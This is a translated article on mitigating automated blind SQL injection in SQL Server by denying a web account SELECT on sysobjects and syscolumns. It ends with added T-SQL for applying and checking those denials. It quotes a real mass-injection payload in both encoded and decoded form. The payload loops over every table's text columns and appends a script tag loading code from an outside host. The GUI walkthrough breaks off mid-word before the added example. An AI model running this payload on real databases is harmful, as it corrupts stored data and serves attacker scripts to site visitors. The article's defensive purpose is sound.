Mitigating Blind SQL Injection with SQL Server Permissions [Network Technology]
Source: 安全中国
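So-called blind SQL injection means using an automated program to scan for injection points automatically; the program can also scan the data tables automatically and carry out large-scale bulk injection, and it is the most damaging kind.
Here we look at a way of mitigating blind SQL injection that relates to SQL Server permissions.
Generally, the code that a blind SQL injection finally injects resembles the following fragment (SQL Server 2000/2005):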
DeCLaRE @S NvArCHaR(4000);SeT @S=CaSt(0x[hex-encoded statement omitted] aS NvArChAR(4000));ExEc(@S);--
Decoded, it is the following fragment:
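-- Working variables: @T holds a table name, @C a column name
Declare @T Varchar(255),@C Varchar(255)
-- Cursor over every user table (Xtype='u') and its text-type columns
Declare Table_Cursor Cursor
For Select A.Name,B.Name From Sysobjects A,Syscolumns B
Where A.Id=B.Id And A.Xtype='u'
-- Column types: 99=ntext, 35=text, 231=nvarchar, 167=varchar
And (B.Xtype=99 Or B.Xtype=35 Or B.Xtype=231 Or B.Xtype=167)
Open Table_Cursor Fetch Next From Table_Cursor Into @T,@C
While(@@Fetch_Status=0)
Begin
-- Append the script tag to the value of that column in every row
Exec('update ['+@T+'] Set ['+@C+']=Rtrim(Convert(Varchar(8000),['+@C+']))+''《script src=http://3b3.org/c.js》《/script》''')
Fetch Next From Table_Cursor Into @T,@C
End
Close Table_Cursor
Deallocate Table_Cursor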
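I replaced the Script tags in it.
You can also see the table names sysobjects and syscolumns, which I marked in bold. Blind SQL injection relies on these two system tables to do its traversal.
So a stopgap way to mitigate blind SQL injection is to take the account the program uses to access the database (note: never use the default sa privileges; I recommend creating a separate account for your web application with only the access it needs) and remove its access permissions on these system tables, which prevents blind injection (I say blind injection specifically, because the injection point still exists; this only mitigates blind SQL injection).
For example, if the account your web application uses to access the database is tnt001, the way to revoke its access permissions on the system tables sysobjects and syscolumns is as follows:
SQL Server 2000 is fairly intuitive and simple, whereas from SQL Server 2005 onward the whole system architecture was completely restructured and there are some differences, so SQL Server 2005 is used as the example here for a detailed explanation (SQL Server 2008 is similar):
Step 1: Select a specific database, click the node "Security" -> "Users", then select the account you need, for example tnt001, right-click it and choose Properties
Step 2: On the left side of the Properties page, select "Secur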
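The permission change described above (removing tnt001's access to sysobjects and syscolumns) can also be scripted and then checked. The following T-SQL is an added example, not part of the original article; the database name YourAppDb is a placeholder, and it assumes tnt001 already exists as a user in that database.

```sql
-- Added example (not from the original article).
-- Assumptions: YourAppDb is a placeholder database name; tnt001 is the
-- article's example account and already exists as a user in that database.
USE YourAppDb;
GO

-- Deny read access to the two compatibility views that the injected
-- cursor joins to enumerate user tables and their text-type columns.
DENY SELECT ON OBJECT::sys.sysobjects TO tnt001;
DENY SELECT ON OBJECT::sys.syscolumns TO tnt001;
GO

-- Check 1: list the explicit permission entries recorded for the account.
-- sys.all_objects is used because system views are not listed in sys.objects.
SELECT pr.name            AS principal_name,
       pe.state_desc      AS permission_state,
       pe.permission_name,
       o.name             AS object_name
FROM sys.database_permissions AS pe
JOIN sys.database_principals  AS pr ON pr.principal_id = pe.grantee_principal_id
JOIN sys.all_objects          AS o  ON o.object_id     = pe.major_id
WHERE pe.class = 1                      -- object- or column-level entries
  AND pr.name = N'tnt001'
  AND o.name IN (N'sysobjects', N'syscolumns');
GO

-- Check 2: ask the engine for the effective permission while impersonating
-- the account. HAS_PERMS_BY_NAME returns 1 = permitted, 0 = not permitted.
EXECUTE AS USER = 'tnt001';
SELECT HAS_PERMS_BY_NAME('sys.sysobjects', 'OBJECT', 'SELECT') AS can_read_sysobjects,
       HAS_PERMS_BY_NAME('sys.syscolumns', 'OBJECT', 'SELECT') AS can_read_syscolumns;
REVERT;
GO
```

DENY has no effect on sysadmin logins or on the dbo user, which is one more reason to follow the advice above against connecting the web application as sa.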